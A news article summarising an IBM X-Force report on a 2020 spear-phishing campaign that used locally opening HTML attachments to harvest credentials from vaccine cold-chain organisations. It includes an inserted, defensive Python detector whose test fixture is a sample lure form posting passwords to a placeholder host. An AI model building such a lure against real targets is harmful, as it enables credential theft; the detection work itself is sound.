4 December 2020

Global phishing campaign targets COVID-19 vaccine operations



Researchers are warning of a global phishing campaign aimed at organizations associated with the COVID-19 cold chain, the companies responsible for keeping vaccines cold enough for safe storage and transportation.

Active since September 2020, this phishing operation spanned six countries and targeted organizations likely associated with the Cold Chain Equipment Optimization Platform (CCEOP) program of Gavi, The Vaccine Alliance, a new report from IBM Security X-Force says. While the research team did not link the campaign to any particular threat actor or government, they say that the operation is likely the work of state-backed hackers.

“We assess that the purpose of this campaign may have been to harvest credentials to gain future unauthorized access. From there, the adversary could gain insight into internal communications, as well as the process, methods and plans to distribute a COVID-19 vaccine. This includes information regarding infrastructure that governments intend to use to distribute a vaccine to the vendors that will be supplying it,” the researchers said.

The malicious campaign involves spear phishing emails ostensibly from an executive at Haier Biomedical, a Chinese company that is currently a supplier for the Gavi CCEOP program. The phishing emails posed as requests for quotations (RFQ) related to the CCEOP program and contained malicious HTML attachments that open locally, prompting recipients to enter their credentials to view the file.

“This phishing technique helps attackers avoid setting up phishing pages online that can be discovered and taken down by security research teams and law enforcement,” the report notes.
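Because the credential prompt lives in the attachment rather than on a hosted page, mail-gateway triage has to inspect the HTML file itself. The sketch below is an added example, not code from the IBM report or this article: it flags an attachment that contains a password field together with a form that submits to a remote http(s) address. The function and class names are hypothetical, the sample attachments are constructed, and forms assembled by script at run time are outside what this static check sees.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse


class _FormScan(HTMLParser):
    """Records remote form targets and whether a password input is present."""

    def __init__(self):
        super().__init__()
        self.remote_actions = []
        self.has_password = False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            action = a.get("action", "").strip()
            # A locally opened file has no server of its own, so an absolute
            # http(s) action means the entered data leaves the machine.
            if urlparse(action).scheme.lower() in ("http", "https"):
                self.remote_actions.append(action)
        elif tag == "input" and a.get("type", "").lower() == "password":
            self.has_password = True


def triage_html_attachment(html_text):
    """Return a verdict dict for one HTML attachment (hypothetical helper)."""
    scan = _FormScan()
    scan.feed(html_text)
    scan.close()
    return {
        "suspicious": scan.has_password and bool(scan.remote_actions),
        "password_field": scan.has_password,
        "remote_actions": scan.remote_actions,
    }


# Constructed samples; the .example hosts are placeholders, not indicators.
SAMPLE_LURE = """<html><body><p>Sign in to view the RFQ document</p>
<form method="POST" action="https://collector.example/submit">
<input type="email" name="u"><input type="PASSWORD" name="p"/>
<button>View file</button></form></body></html>"""

SAMPLE_BENIGN = """<html><body><h1>Quotation summary</h1>
<form action="https://intranet.example/search"><input type="text" name="q">
</form></body></html>"""

if __name__ == "__main__":
    for name, doc in (("lure", SAMPLE_LURE), ("benign", SAMPLE_BENIGN)):
        print(name, triage_html_attachment(doc))
```
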

IBM says that the list of targets includes the European Commission’s Directorate-General for Taxation and Customs Union, as well as organizations within the energy, manufacturing, website creation and software and internet security solutions sectors.

The spear phishing campaign targeted select executives in sales, procurement, information technology and finance positions, likely involved in company efforts to support a vaccine cold chain. At this point, it is unclear if the phishing campaign was successful.

The IBM Security X-Force’s report also provides recommendations to defenders and a list of IoCs related to this phishing campaign.
